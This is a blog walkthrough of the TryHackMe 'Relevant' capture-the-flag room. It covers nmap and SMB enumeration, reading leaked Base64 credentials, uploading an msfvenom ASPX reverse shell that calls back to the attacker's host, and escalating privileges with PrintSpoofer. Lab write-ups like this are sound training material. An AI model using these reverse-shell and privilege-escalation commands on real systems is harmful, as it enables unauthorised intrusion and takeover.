Relevant — TryHackMe Walkthrough
Hello, everyone! I am here to lead you through a TryHackMe room that I found particularly captivating, titled ‘Relevant.’ While there are various methods available on the internet for obtaining a root shell on the vulnerable machine, I will be sharing my approach in this blog.
1- Enumeration
As usual, we will start by enumerating the target machine using a network scanner to identify open ports. To accomplish this, we can execute an Nmap command:
“nmap -sC -A -Pn 10.10.x.x”
This initial step will provide us with valuable information about the machine's exposed services and potential entry points.
Upon reviewing the output, we can observe that an HTTP server is running on port 80, SMB ports are accessible at 139 and 335, and port 3389 is designated for RDP (Remote Desktop Protocol). At this point, we can first check out the HTTP port and see if there is any clue left for us:
We are greeted with a default Windows Server page when accessing the HTTP service. No apparent anomalies were discovered in the page’s source code.
2. Exploitation
To delve deeper into our reconnaissance, our next step involves enumerating the SMB share using the built-in Kali tool ‘smbclient.’ Executing the following command will reveal the available shares on the target:
“smbclient -L \\\\10.10.x.x\\”
We have come across a share named ‘nt4wrksv.’ To conduct a more comprehensive enumeration of this share, we will need to specify the share name in the following manner:
“smbclient \\\\10.10.x.x\\nt4wrksv”
Fantastic! We have successfully gained access to the SMB share. With this access, we can begin our search for interesting files using basic SMB commands.
An interesting file, ‘passwords.txt,’ has caught our attention. Let’s investigate its contents. To accomplish this, we will start by using the ‘get’ command to download it onto our machine. Afterward, we can examine its contents.
There is a username-password combination encoded with Base64. Decoding Base64-encoded data offers numerous methods, from online websites to various tools within Kali Linux. For this task, I utilized the following command to decrypt and retrieve the credentials
“echo -n “encoded text” | base64 -d”
These credentials were expected to grant us access to the target. I attempted to use xfreerdp with both usernames, but unfortunately, I didn’t achieve the desired results. During my investigation, I discovered that there’s another open port at 49663, which wasn’t initially detected in my scan as it only covered the top 1000 most commonly used ports.
Lets run a gobuster against all the ports we just found with the following command:
“gobuster -dir -u 10.10.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt”
We can see from the output that /nt4wrksv directory was found with a 301 status code.
Let’s proceed to access this port and directory. Initially, it appears that there is not any visible content. However, recognizing that it bears the same SMB share name, let’s try appending ‘/password.txt’ to the URL to see if we can access it, and indeed, we are able to view its contents:
This discovery confirms that SMB files are being hosted on the web, potentially serving as our point of entry. Let’s explore using msfvenom to generate a reverse shell.
“msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=5619 -f aspx > reverse.aspx”
Now, our next step involves uploading this file to the SMB share using the ‘PUT’ command. Afterward, we should initiate a Netcat listener to prepare for the reverse shell.
We can now navigate to “http://TARGET_IP/nt4wrksv/reverse.aspx”
Success! We successfully triggered the reverse shell and gained a shell on the target as shown below:
To locate the first flag, let’s navigate to the ‘Bob’ user’s directory and examine the contents of the Desktop. This will mark the completion of the initial stage of our mission.
3. Privilege Escalation
To gain privileged access on the target, I first attempted to utilize Winpeas by transferring it from my attacking machine. However, it did not uncover any critical vulnerabilities. I used the following commands to copy the file.
After spending some time searching for a solution, I executed the following command to check the current user’s privileges:
“whoami /priv”
Here we can observe that the ‘SeImpersonatePrivilege’ is enabled. This caught my attention because its description indicates ‘Impersonate a client after authentication.’ This suggests that we may have the opportunity to impersonate the administrator. After doing research on Google, I found that PrintSpoofer.exe may assist us in elevating our privileges. You can also utilize the following page: https://github.com/k4sth4/PrintSpoofer
After downloading the file to our attacker machine, we must transfer it to the target using the same commands I previously demonstrated while using Winpeas.
Now that the exploit is installed on the target, let’s execute it using the following command:
“.\PrintSpoofer64.exe -i -c cmd”
Excellent! We can now confirm that we have acquired a privileged shell.
The final task remaining is to find the root flag, which is located under the Desktop of the Administrator user.
Thank you very much for following-up. I hope this has been helpful for your CTF challenge. Looking forward to the next one!
-Ömer
